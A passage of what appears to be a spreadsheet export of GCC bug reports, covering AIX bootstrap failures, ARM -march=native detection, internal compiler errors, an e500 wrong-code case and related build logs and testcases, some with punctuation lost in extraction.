/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/xgcc -B/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/ -B/mtg/TOOL/gcc-4.3.2/powerpc-AIX5.2/powerpc-ibm-aix5.2.0.0/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros 				     -Wno-overlength-strings    -DHAVE_CONFIG_H -I. -I. -I/mtg/arc/gcc-4.3.2/gcc -I/mtg/arc/gcc-4.3.2/gcc/. -I/mtg/arc/gcc-4.3.2/gcc/../include -I./../intl -I/mtg/arc/gcc-4.3.2/gcc/../libcpp/include -I/mtg/TOOL/powerpc-AIX5.2/include -I/mtg/TOOL/include -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber/dpd -I../libdecnumber    insn-attrtab.c -o insn-attrtab.o
/mtg/arc/gcc-4.3.2/gcc/config/rs6000/rs6000.md: In function 'internal_dfa_insn_code':
/mtg/arc/gcc-4.3.2/gcc/config/rs6000/rs6000.md:148: internal compiler error: Illegal instruction
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [insn-attrtab.o] Error 1
make[4]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/gcc'
make[3]: *** [all-stage2-gcc] Error 2
make[3]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
make[2]: *** [stage2-bubble] Error 2
make[2]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
make[1]: *** [bootstrap] Error 2
make[1]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
cd gcc-4.3.2-powerpc-AIX5.2
/mtg/TOOL/powerpc-AIX5.2/bin/bash /mtg/arc/gcc-4.3.2/configure --prefix=/mtg/TOOL/gcc-4.3.2 --exec-prefix=/mtg/TOOL/gcc-4.3.2/powerpc-AIX5.2 --with-gmp=/mtg/TOOL/powerpc-AIX5.2 --with-mpfr=/mtg/TOOL
After researching the problem on the internet I found some reports that indicated that this file was too large in some environments.  
  -rw-rw-r--  1 trudeajo fhaf    6278 2008-10-03 14:07 insn-attr.h
  -rw-rw-r--  1 trudeajo fhaf 1393534 2008-10-03 14:07 insn-attrtab.c
I attempted to reduce the size by removing some includes from rs6000.md:
--- gcc/config/rs6000/rs6000.md.~1~	2008-07-03 19:32:23.000000000 -0700
+++ gcc/config/rs6000/rs6000.md	2008-10-02 16:56:12.000000000 -0700
@@ -15910 +1596 @@
 (include rios2.md)
 (include rs64.md)
 (include mpc.md)
-(include 40x.md)
-(include 440.md)
-(include 603.md)
-(include 6xx.md)
 (include 7xx.md)
 (include 7450.md)
 (include 8540.md)
This allowed insn-attrtab.c to compile however the build failed on the very next compile:
build/genattr /mtg/arc/gcc-4.3.2/gcc/config/rs6000/rs6000.md \
	  insn-conditions.md &gt; tmp-attr.h
/mtg/TOOL/powerpc-AIX5.2/bin/bash /mtg/arc/gcc-4.3.2/gcc/../move-if-change tmp-attr.h insn-attr.h
echo timestamp &gt; s-attr
/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/xgcc -B/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/ -B/mtg/TOOL/gcc-4.3.2/powerpc-AIX5.2/powerpc-ibm-aix5.2.0.0/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros 				     -Wno-overlength-strings    -DHAVE_CONFIG_H -I. -I. -I/mtg/arc/gcc-4.3.2/gcc -I/mtg/arc/gcc-4.3.2/gcc/. -I/mtg/arc/gcc-4.3.2/gcc/../include -I./../intl -I/mtg/arc/gcc-4.3.2/gcc/../libcpp/include -I/mtg/TOOL/powerpc-AIX5.2/include -I/mtg/TOOL/include -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber/dpd -I../libdecnumber    insn-attrtab.c -o insn-attrtab.o
/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/xgcc -B/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/./prev-gcc/ -B/mtg/TOOL/gcc-4.3.2/powerpc-AIX5.2/powerpc-ibm-aix5.2.0.0/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros 				     -Wno-overlength-strings    -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I/mtg/arc/gcc-4.3.2/gcc -I/mtg/arc/gcc-4.3.2/gcc/build -I/mtg/arc/gcc-4.3.2/gcc/../include -I./../intl -I/mtg/arc/gcc-4.3.2/gcc/../libcpp/include -I/mtg/TOOL/powerpc-AIX5.2/include -I/mtg/TOOL/include -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber -I/mtg/arc/gcc-4.3.2/gcc/../libdecnumber/dpd -I../libdecnumber    -o build/genautomata.o /mtg/arc/gcc-4.3.2/gcc/genautomata.c
/mtg/arc/gcc-4.3.2/gcc/genautomata.c: In function 'create_automata':
/mtg/arc/gcc-4.3.2/gcc/genautomata.c:6534: internal compiler error: Illegal instruction
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [build/genautomata.o] Error 1
make[4]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2/gcc'
make[3]: *** [all-stage2-gcc] Error 2
make[3]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
make[2]: *** [stage2-bubble] Error 2
make[2]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
make[1]: *** [bootstrap] Error 2
make[1]: Leaving directory `/mtg/arc/gcc-4.3.2-powerpc-AIX5.2'
I also tried the latest 4.3 snapshot with the same results.
GCC 4.2.4 bootstrap is successful on this host.</t>
  </si>
  <si>
    <t>JFTrudeau</t>
  </si>
  <si>
    <t>GCC-82175</t>
  </si>
  <si>
    <t>[8 Regression] -march=native fails on armv7 big/little system armv7l-unknown-linux-gnueabihf with gcc 8.0.0</t>
  </si>
  <si>
    <t>gcc-7.2.0 is ok on this target but gcc-8.0.0 fails to detect native target.
cat &gt; test.c
#include 
int main(void)
{
printf(Hello World\n)
return 0
}
^D
/usr/local/gcc-8.0.0/bin/gcc -march=native -o test800 test.c
gcc: error: unrecognized -march target: native
gcc: note: valid arguments are: armv2 armv2a armv3 armv3m armv4 armv4t armv5 armv5t armv5e armv5te armv5tej armv6 armv6j armv6k armv6z armv6kz armv6zk armv6t2 armv6-m armv6s-m armv7 armv7-a armv7ve armv7-r armv7-m armv7e-m armv8-a armv8.1-a armv8.2-a armv8-m.base armv8-m.main armv8-r iwmmxt iwmmxt2
gcc: error: unrecognized -march target: native
gcc: note: valid arguments are: armv2 armv2a armv3 armv3m armv4 armv4t armv5 armv5t armv5e armv5te armv5tej armv6 armv6j armv6k armv6z armv6kz armv6zk armv6t2 armv6-m armv6s-m armv7 armv7-a armv7ve armv7-r armv7-m armv7e-m armv8-a armv8.1-a armv8.2-a armv8-m.base armv8-m.main armv8-r iwmmxt iwmmxt2
gcc: error: missing argument to â€˜-march=â€™
But --help=target gives a result but seems to use armv8 syntax.
/usr/local/gcc-8.0.0/bin/gcc -Q --help=target  |&amp; grep march
  -march=                               armv7-a+fp
gcc-7.2.0 gives:
/usr/local/gcc-7.2.0/bin/gcc -Q --help=target  |&amp; grep march
  -march=                               armv7-a
Both versions of gcc configured identically apart from --prefix=
/usr/local/gcc-8.0.0/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/usr/local/gcc-8.0.0/bin/gcc
COLLECT_LTO_WRAPPER=/usr/local/gcc-8.0.0/libexec/gcc/armv7l-unknown-linux-gnueab
ihf/8.0.0/lto-wrapper
Target: armv7l-unknown-linux-gnueabihf
Configured with: ../gcc-8.0.0/configure --prefix=/usr/local/gcc-8.0.0 --program-
suffix= --disable-werror --enable-shared --enable-threads=posix --enable-checkin
g=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exception
s --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=g
nu --enable-plugin --enable-gnu-indirect-function --enable-lto --with-isl --enab
le-languages=cc++fortranlto --disable-libgcj --enable-clocale=gnu --disable-l
ibstdcxx-pch --enable-install-libiberty --disable-multilib --disable-libssp --en
able-default-pie --enable-default-ssp --host=armv7l-unknown-linux-gnueabihf --bu
ild=armv7l-unknown-linux-gnueabihf --with-arch=armv7-a --with-float=hard --with-
fpu=vfpv3-d16 --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170910 (experimental) (GCC) 
Target/Host system is a ODroid-XU4 with 8 cores:
Cores 0..3: ARM Cortex-A7 rev 3 (0x4100c070)
Cores 4..7: ARM Cortex-A15 rev 3 (0x4100c0f0)
cat /proc/cpuinfo
processor	: 0
model name	: ARMv7 Processor rev 3 (v7l)
BogoMIPS	: 18.00
Features	: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt 
vfpd32 lpae evtstrm 
CPU implementer	: 0x41
CPU architecture: 7
CPU variant	: 0x0
CPU part	: 0xc07
CPU revision	: 3
...
processor	: 4
model name	: ARMv7 Processor rev 3 (v7l)
BogoMIPS	: 18.00
Features	: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt 
vfpd32 lpae evtstrm 
CPU implementer	: 0x41
CPU architecture: 7
CPU variant	: 0x2
CPU part	: 0xc0f
CPU revision	: 3
...</t>
  </si>
  <si>
    <t>andrewm.roberts</t>
  </si>
  <si>
    <t>GCC-52503</t>
  </si>
  <si>
    <t>sh-wrs-vxworks: too many target masks</t>
  </si>
  <si>
    <t>gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include -I/opt/cfarm/mpc/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    ../../../gcc/gcc/lto-wrapper.c -o lto-wrapper.o
In file included from ../../../gcc/gcc/lto-wrapper.c:47:0:
./options.h:3697:2: error: #error too many target masks</t>
  </si>
  <si>
    <t>GCC-17261</t>
  </si>
  <si>
    <t>Boostrap generates suprious files if makeinfo is missing</t>
  </si>
  <si>
    <t>Shortly after bootstrap starts I see the following contents in my
build directory:
4.0.9                    Copyright    Inc.             not         source
A                        even         intl             or          the
build-i686-pc-linux-gnu  extent       is               PARTICULAR  There
by                       FITNESS      law.             permitted   This
(C)                      for          log              PURPOSE    to
conditions.              FOR          log2             sed         version
config.cache             Foundation  logflex          see         warranty
config.log               free         Makefile         serdep.tmp
config.status            Free         MERCHANTABILITY  software
copying                  GNU          NO               Software
Note that there are lots of (empty) files that seem to be part of
some GNU license text. I tracked this down and found that the following
lines from the top level makefile generate this:
CONFIGURED_MAKEINFO = /home/ehrhardt/gcc-3.5-cvs/gcc/missing makeinfo
MAKEINFO = `if [ -f $$r/$(BUILD_SUBDIR)/texinfo/makeinfo/Makefile ]  \
        then echo $$r/$(BUILD_SUBDIR)/texinfo/makeinfo/makeinfo  \
        else if (${CONFIGURED_MAKEINFO} --version \
          | egrep 'texinfo[^0-9]*([1-3][0-9]|4\.[2-9]|[5-9])') &gt;/dev/null 2&gt; \
        then echo ${CONFIGURED_MAKEINFO} else echo $$s/missing makeinfo fi fi`
More specifically the fact that configure did not find a makeinfo
leads to the following call to missing:
   /home/ehrhardt/gcc-3.5-cvs/gcc/missing makeinfo --version
which missing can't handle properly. Instead it will interpret --version
as a file that is passed to sed. sed happily outputs it's version and
copyright which is then passed to touch.
    regards   Christian</t>
  </si>
  <si>
    <t>GCC-1579</t>
  </si>
  <si>
    <t>2.95.2 fails when compiling mySQL package with 'internal compiler error'</t>
  </si>
  <si>
    <t>Internal compiler error while compiling sql_acl.cc 
from mySQL package. Output:
sql_acl.cc: In function `int replace_column_table(THD * GRANT_TABLE * TABLE * const LEX_USER &amp; List &amp; const char * const char * unsigned int bool)':
sql_acl.cc:1367: Internal compiler error in `scan_region' at except.c:2566
Please submit a full bug report.
See  for instructions.
Release:
2.95.2 19991024 (release)
Environment:
alpha-dec-osf4.0b
How-To-Repeat:
command line:
c++ -DMYSQL_SERVER                      -DDEFAULT_MYSQL_HOME=\/usr/local\  -DDATADIR=\/usr/local/var\                   -DSHAREDIR=\/usr/local/share/mysql\                         -DHAVE_CONFIG_H -I./../include                 -I./../regex                     -I. -I../include -I.. -I.    -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -O3 -DDBUG_OFF   -fno-implicit-templates -c sql_acl.cc</t>
  </si>
  <si>
    <t>GCC-35372</t>
  </si>
  <si>
    <t>Memory corruption at unchecked deallocation of the interface classwide type</t>
  </si>
  <si>
    <t>Unchecked deallocation of the access to interface classwide type has corupt memory.
Valgrind output:
==8176== Invalid read of size 4
==8176==    at 0x804EF32: system__finalization_implementation__finalize_list (s-finimp.adb:360)
==8176==    by 0x804EFE8: system__finalization_implementation__finalize_global_list (s-finimp.adb:327)
==8176==    by 0x8049611: main (b~driver.adb:171)
==8176==  Address 0x4187030 is 8 bytes inside a block of size 16 free'd
==8176==    at 0x402288A: free (vg_replace_malloc.c:323)
==8176==    by 0x8051787: __gnat_free (s-memory.adb:117)
==8176==    by 0x8049BBB: driver__z.182 (driver.adb:9)
==8176==    by 0x8049B0A: _ada_driver (driver.adb:13)
==8176==    by 0x804960C: main (b~driver.adb:170)
==8176== 
==8176== Invalid read of size 4
==8176==    at 0x804EF37: system__finalization_implementation__finalize_list (s-finimp.adb:361)
==8176==    by 0x804EFE8: system__finalization_implementation__finalize_global_list (s-finimp.adb:327)
==8176==    by 0x8049611: main (b~driver.adb:171)
==8176==  Address 0x4187028 is 0 bytes inside a block of size 16 free'd
==8176==    at 0x402288A: free (vg_replace_malloc.c:323)
==8176==    by 0x8051787: __gnat_free (s-memory.adb:117)
==8176==    by 0x8049BBB: driver__z.182 (driver.adb:9)
==8176==    by 0x8049B0A: _ada_driver (driver.adb:13)
==8176==    by 0x804960C: main (b~driver.adb:170)
==8176==</t>
  </si>
  <si>
    <t>vgodunko</t>
  </si>
  <si>
    <t>GCC-10147</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Confusing error message for invalid template function argument</t>
  </si>
  <si>
    <t>snaga:tmp&gt; cat bug.ii 
namespace N1
{
typedef long A
struct B
{
  virtual A a() const
}
struct D : public B
{
  A a() const
}
}
N1::D d()
namespace N2
{
struct A {}
template  T tf(const T &amp;)
{
  return T()
}
void f(const N1::B &amp; b)
{
 tf(b.a())
}
}
void f2()
{
  N2::f(d())
}
snaga:tmp&gt; /opt/gcc-3.2.2/bin/g++ -c bug.ii 
bug.ii: In function `void N2::f(const N1::B&amp;)':
bug.ii:32: could not convert `(**(+b)-&gt;N1::B::_vptr.B)((+b))' to `const N2::A&amp;'
bug.ii:26: in passing argument 1 of `T N2::tf(const T&amp;) [with T = N2::A]'
snaga:tmp&gt; /opt/gcc-3.2.2/bin/g++ -v 
Reading specs from /opt/gcc-3.2.2/lib/gcc-lib/i686-pc-linux-gnu/3.2.2/specs
Configured with: /tmp/post_install/gcc-3.2.2/configure --enable-languages=cc++ --prefix=/opt/gcc-3.2.2
Thread model: posix
gcc version 3.2.2
Release:
3.2.2
Environment:
snaga:tmp&gt; uname -a
Linux snaga.sics.se 2.4.19 #7 Fri Nov 29 15:22:22 CET 2002 i686 i686 i386 GNU/Linux
snaga:tmp&gt; cat /etc/redhat-release 
Red Hat Linux release 8.0 (Psyche)</t>
  </si>
  <si>
    <t>GCC-14009</t>
  </si>
  <si>
    <t>libgcj HttpURLConnection does not handle situation where retrieving url without trailing slash after domain.</t>
  </si>
  <si>
    <t>gnu.java.net.protocol.http.Connection.sendRequest() does not handle situation
where a URL like http://www.apache.org (without trailing slash) is specified.
For the attached example the following is executed via Sun Java:
  [ken@deviation spider]$ /usr/j2sdk1.4.2_01/bin/javac test.java
  [ken@deviation spider]$ java test apache.org
  Retrieveing: http://apache.org/
  Got: 8613 bytes
  Retrieveing: http://apache.org
  Got: 8613 bytes
When compiled and run with GCJ the following happens:
  [ken@deviation spider]$ CLASSPATH=/opt/gcc/share/java/libgcj-3.5.0.jar
/opt/gcc/bin/gcj -ggdb -O --main=test test.java -o test &amp;&amp;
LD_LIBRARY_PATH=/opt/gcc/lib ./test apache.org
  Retrieveing: http://apache.org/
  Got: 8613 bytes
  Retrieveing: http://apache.org
  Exception in thread main java.io.IOException: Server reply was unparseable:
   at gnu.java.net.protocol.http.Connection.receiveReply()
(/opt/gcc/lib/libgcj.so.6.0.0)
   at gnu.java.net.protocol.http.Connection.connect() (/opt/gcc/lib/libgcj.so.6.0.0)
   at gnu.java.net.protocol.http.Connection.getInputStream()
(/opt/gcc/lib/libgcj.so.6.0.0)
   at test.main(java.lang.String[]) (/home/ken/workspace/spider/test.java:27)
The server-reply-unparseable error is due to the fact that the request was sent
out as GET  HTTP/1.1 and the webserver just sends back an HTMLified error
page sans the HTTP response headers.
What GCJ should be doing in this case is sending the request as GET / HTTP/1.1
and not GET  HTTP/1.0. One could probably get caught up in the argument
whether the original URL is syntactically correct but the Sun implementation
works as expected so the GCJ one should probably try to emulate that behaviour.</t>
  </si>
  <si>
    <t>GCC-58209</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in extract_range_from_binary_expr at tree-vrp.c:2294</t>
  </si>
  <si>
    <t>seen with 4.6.4 4.7.3 4.8.1 and trunk with -O2 lowering to -O1 works around the issue.
$ gcc-4.7 -c -O2 foo.c 
foo.c: In function 'pow2_s':
foo.c:3:7: internal compiler error: in build2_stat at tree.c:3785
Please submit a full bug report
with preprocessed source if appropriate.
$ /usr/lib/gcc-snapshot/bin/gcc -c -O2 foo.c 
foo.c: In function 'pow2_s':
foo.c:25:1: error: invalid (pointer) operands to plus/minus
 }
 ^
acc_tmp_14 = add_acc_5 + _1
foo.c:25:1: internal compiler error: verify_gimple failed
Please submit a full bug report
$ cat foo.c
#include 
void *pow2_s(void *arg)
{
    intptr_t n = (intptr_t)arg
    if (n == 0)
        return (void *)1
    n--
    intptr_t s1 = (intptr_t)pow2_s((void *)n)
    intptr_t s2 = (intptr_t)pow2_s((void *)n)
    return (void *)(s1 + s2)
}
int main(void)
{
    intptr_t n = 5
    pow2_s((void *)n)
    return 0
}</t>
  </si>
  <si>
    <t>GCC-13429</t>
  </si>
  <si>
    <t>[3.4 Regression] Tree checking failure during error recovery</t>
  </si>
  <si>
    <t>The testcase (derived from g++.old-deja/g++.other/crash34.C) causes a tree
checking failure:
crash34.C:14: error: field `X' has incomplete type
crash34.C:14: internal compiler error: tree check: expected class 't' have 'x'
(error_mark) in c_apply_type_quals_to_decl at c-common.c:2829
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is a regression since GCC 3.3.3pre (w/ checking) returns:
crash34.C:14: error: field `X' has incomplete type
crash34.C: In function `void foo()':
crash34.C:22: error: `X' is not a member of type `w'</t>
  </si>
  <si>
    <t>GCC-3410</t>
  </si>
  <si>
    <t>Cannot build gcc 3.0 for m68k-elf target  stage 2 compiler bug</t>
  </si>
  <si>
    <t>When trying to build GCC after the binutils have been built I 
take the following steps.  (The target I am trying to build 
for is m68k-elf with i486-suse-linux as host.)
zcat gcc-3.0.tar.gz | tar -xvf -
md gcc-obj
cd gcc-obj
../gcc-3.0/configure --target=m68k-elf --prefix=/opt/uClinux/m68k-elf --disable-shared --enable-multilib
make
This fails see attachment for last few error/warning messages.
make
Release:
gcc 3.0
Environment:
Building on a intel Celeron running Linux 2.2.16 arch i686 SuSE distribution.
GCC info:
cc -v
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
Source GCC is 3.0 with Binutils 2.11.2
How-To-Repeat:
Just try the instructions that I have mentioned in the description.</t>
  </si>
  <si>
    <t>fakber</t>
  </si>
  <si>
    <t>GCC-66471</t>
  </si>
  <si>
    <t>BITMAP is a reserved keyword on MinGW</t>
  </si>
  <si>
    <t>gcc/mem-stats-traits.h has:
/* Memory allocation origin.  */
   enum mem_alloc_origin
   {
     HASH_TABLE
     HASH_MAP
     HASH_SET
     VEC
     BITMAP
     GGC
     ALLOC_POOL
     MEM_ALLOC_ORIGIN_LENGTH
   }
and this fails to compile on mingw-w64 with:
In file included from /usr/x86_64-w64-mingw32/sys-root/mingw/include/windows.h:71:0
                 from ../../combined-6.0.0/gcc/config/i386/host-mingw32.c:29:
/usr/x86_64-w64-mingw32/sys-root/mingw/include/wingdi.h:467:5: error: 'typedef struct tagBITMAP BITMAP' redeclared as different kind of symbol
   } BITMAP*PBITMAP*NPBITMAP*LPBITMAP
     ^
In file included from ../../combined-6.0.0/gcc/hash-table.h:204:0
                 from ../../combined-6.0.0/gcc/coretypes.h:310
                 from ../../combined-6.0.0/gcc/config/i386/host-mingw32.c:22:
../../combined-6.0.0/gcc/mem-stats-traits.h:11:3: note: previous declaration 'mem_alloc_origin BITMAP'
   BITMAP
   ^
In file included from /usr/x86_64-w64-mingw32/sys-root/mingw/include/windows.h:71:0
                 from ../../combined-6.0.0/gcc/config/i386/host-mingw32.c:29:
/usr/x86_64-w64-mingw32/sys-root/mingw/include/wingdi.h:2688:55: error: 'BITMAP' does not name a type
   WINGDIAPI HBITMAP WINAPI CreateBitmapIndirect(CONST BITMAP *pbm)
                                                       ^
In file included from /usr/x86_64-w64-mingw32/sys-root/mingw/include/windows.h:71:0
                 from ../../combined-6.0.0/gcc/config/i386/host-mingw32.c:29:
/usr/x86_64-w64-mingw32/sys-root/mingw/include/wingdi.h:3218:5: error: 'BITMAP' does not name a type
     BITMAP dsBm
     ^
../../combined-6.0.0/gcc/config/i386/x-mingw32:30: recipe for target 'host-mingw32.o' failed
Renaming BITMAP enum should ne enough.</t>
  </si>
  <si>
    <t>ismail</t>
  </si>
  <si>
    <t>GCC-70185</t>
  </si>
  <si>
    <t>fdump-tree-all-graph produces invalid dot files</t>
  </si>
  <si>
    <t>Using fdump-tree-all-graph produces invalid dot files:
...
$ rm *.c.*  gcc test.c -O2 -S -fdump-tree-all-graph  
$ for f in *.dot do dot -Tpdf $f -o dot.pdf done
Warning: test.c.006t.omplower.dot: syntax error in line 1 near '}'
Warning: test.c.007t.lower.dot: syntax error in line 1 near '}'
Warning: test.c.010t.eh.dot: syntax error in line 1 near '}'
Warning: test.c.292t.statistics.dot: syntax error in line 1 near '}'
$ cat test.c.006t.omplower.dot
}
$
...</t>
  </si>
  <si>
    <t>GCC-10611</t>
  </si>
  <si>
    <t>operations on vector mode not recognized in C++</t>
  </si>
  <si>
    <t>Operations (+ - * / etc.) on vector modes are not recognized in c++. The following testcase works for C but not for C++:
typedef float v4sf __attribute__((mode(V4SF)))
void foo()
{
     v4sf a b c
     a = b + c
}
bellatrix:~/src/tests$ g++-3.3 -c -msse2 simd2.cpp
 simd2.cpp: In function `void foo()':
 simd2.cpp:6: error: invalid operands of types `vector float' and `vector
 float'
    to binary `operator+'
same for gcc 3.4. I suspect this is really rejects-legal as I see no reason that it shouldnt (but the documentation isnt clear either - vector mode extensions are within the C Extensions part).
Release:
gcc-3.3 (GCC) 3.3 20030427 (Debian prerelease) gcc-3.4 (GCC) 3.4 20030422 (experimental)
Environment:
ia32 gnu-linux</t>
  </si>
  <si>
    <t>GCC-45201</t>
  </si>
  <si>
    <t>ICE: stack overflow</t>
  </si>
  <si>
    <t>The attached code will lead to a stack overflow if compiled with -std=c++0x and -g . The code compiles fine without -g. gcc-4.5.0 accepts the code just fine as well even when compiled with -g.</t>
  </si>
  <si>
    <t>d534882</t>
  </si>
  <si>
    <t>GCC-43274</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 157244 failed libgomp.graphite/force-parallel-2.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 157244:
http://gcc.gnu.org/ml/gcc-cvs/2010-03/msg00116.html
caused:
FAIL: libgomp.graphite/force-parallel-2.c scan-tree-dump-times graphite 2 loops carried no dependency 2</t>
  </si>
  <si>
    <t>GCC-64307</t>
  </si>
  <si>
    <t>[5 Regression] ICE: verify_gimple failed: invalid argument to gimple call with -fPIC -fipa-icf</t>
  </si>
  <si>
    <t>Created attachment 34279
reduced testcase
Compiler output:
$ gcc -fPIC -fipa-icf testcase.c 
testcase.c: In function 'real_part':
testcase.c:9:1: error: invalid argument to gimple call
 }
 ^
a
# .MEM_2 = VDEF 
retval.0_3 = real_part_2.localalias.0 (a) [tail call]
testcase.c:9:1: internal compiler error: verify_gimple failed
0xc55cd0 verify_gimple_in_cfg(function* bool)
        /mnt/svn/gcc-trunk/gcc/tree-cfg.c:5050
0xb1c20f execute_function_todo
        /mnt/svn/gcc-trunk/gcc/passes.c:1940
0xb1c9cd do_per_function
        /mnt/svn/gcc-trunk/gcc/passes.c:1639
0xb1cae3 execute_todo
        /mnt/svn/gcc-trunk/gcc/passes.c:1997
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r218707 - ICE</t>
  </si>
  <si>
    <t>GCC-4653</t>
  </si>
  <si>
    <t>template instantiation not in sync with Koenig's lookup</t>
  </si>
  <si>
    <t>If the point of instantiation of a class template coincides
with a call to a function which can be found only via Koenig's
lookup and the latter can succeed only if the
instantiation is already done (since the base class of the
class template is involved) then the lookup fails. The
instantiation is done nevertheless since the similar calls
later on in the code produce no diagnostic!
I think this case deserves special treatment in that Koenig's
lookup should be done after the instantiation whereas the
usual one can happen before.
Release:
3.0.1
Environment:
Solaris 8 @ UltraSPARC Linux @ i686
How-To-Repeat:
Compile the attached code sample.</t>
  </si>
  <si>
    <t>GCC-13015</t>
  </si>
  <si>
    <t>internal compiler error with array initializer</t>
  </si>
  <si>
    <t>Compile the following with : g++ -c arrayBug.cc
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
struct dummy {
    int i
    const char* c
}
int main() {
    struct dummy zero = { 0 zero }
    struct dummy one  = { 0 one  }
    struct dummy two  = { 0 two  }
    // this works
    struct dummy *pDumbTable1 = new struct dummy[3] = {
        zero
        one
        two
    }
    // this crashes the compiler
    struct dummy *pDumbTable2 = new struct dummy[3] = {
        { 0 zero}
        { 1 one}
        { 2 two}
    }
}</t>
  </si>
  <si>
    <t>herve</t>
  </si>
  <si>
    <t>GCC-44364</t>
  </si>
  <si>
    <t>Wrong code with e500 double floating point</t>
  </si>
  <si>
    <t>The testcase (which is stripped down perl code) attached compiled with:
gcc -fPIC -fno-strict-aliasing -pipe \
         -O2 \
         -g -o tc-lossings-floats tc-lossings-floats.c -Wall -mno-isel
results in after executing:
|RESET: 252.000000 | 0.000000
|RESET: 504.000000 | 252.000000
|RESET: 756.000000 | 504.000000
|RESET: 1008.000000 | 756.000000
|RESET: 1260.000000 | 1008.000000
|RESET: 1512.000000 | 1260.000000
|RESET: 1764.000000 | 1512.000000
|RESET: 2016.000000 | 1764.000000
|RESET: 2268.000000 | 2016.000000
 =&gt; 2268.000000
|RESET: 2520.000000 | 0.000000
|RESET: 2772.000000 | 2520.000000
With -O1 instead -O2:
|RESET: 252.000000 | 0.000000
|RESET: 504.000000 | 252.000000
|RESET: 756.000000 | 504.000000
|RESET: 1008.000000 | 756.000000
|RESET: 1260.000000 | 1008.000000
|RESET: 1512.000000 | 1260.000000
|RESET: 1764.000000 | 1512.000000
|RESET: 2016.000000 | 1764.000000
|RESET: 2268.000000 | 2016.000000
 =&gt; 2268.000000
|RESET: 2520.000000 | 2268.000000
|RESET: 2772.000000 | 2520.000000
The =&gt; line sets the the second value in the |RESET line. With -O1 is remains where it is with -O2 it gets overwritten. The original perl code gets here a totally random values. 
Now. It is getting better. The source compiled with -S and the resulting assembly file assembled with gcc-4.3 does not show this problem. After diffing of the two resulting binaries I saw  a difference in __floatdidf() which is called from Kino_OutStream_tell(). The variant which is attached by the 4.3 compiler does not use floating point instead it uses integer code which calls other functions (__floatsidf __muldf3 __floatunsidf __adddf3) which use also interger code. The 4.3 compiler was not compiled with --enable-e500_double. 
So after looking at the code I saw now the following:
10000c24 :
10000c6c:       11 23 1a 2c     evmergehi r9r3r3
This function is touching the complete 64bit r9 register
The code which calls it:
10000a40:       91 21 00 20     stw     r932(r1)
10000a44:       4e 80 04 21     bctrl   # tell function which in turn calls floatdidf
10000a7c:       81 21 00 20     lwz     r932(r1)
10000a80:       38 60 00 00     li      r30    
10000a84:       7e 33 8b 78     mr      r19r17 
10000a88:       12 49 92 e1     efdsub  r18r9r18
10000a8c:       10 80 92 fa     efdctsiz r4r18
10000a90:       12 49 4a 17     evmr    r18r9  
So we just save the lower 32bit of r9 before calling the function and the upper 32bit are overwritten by efdsub.</t>
  </si>
  <si>
    <t>GCC-17543</t>
  </si>
  <si>
    <t>#pragma weak undocumented</t>
  </si>
  <si>
    <t>The user manual doesn't mention the existence of #pragma weak at all.  The internals manual mentions 
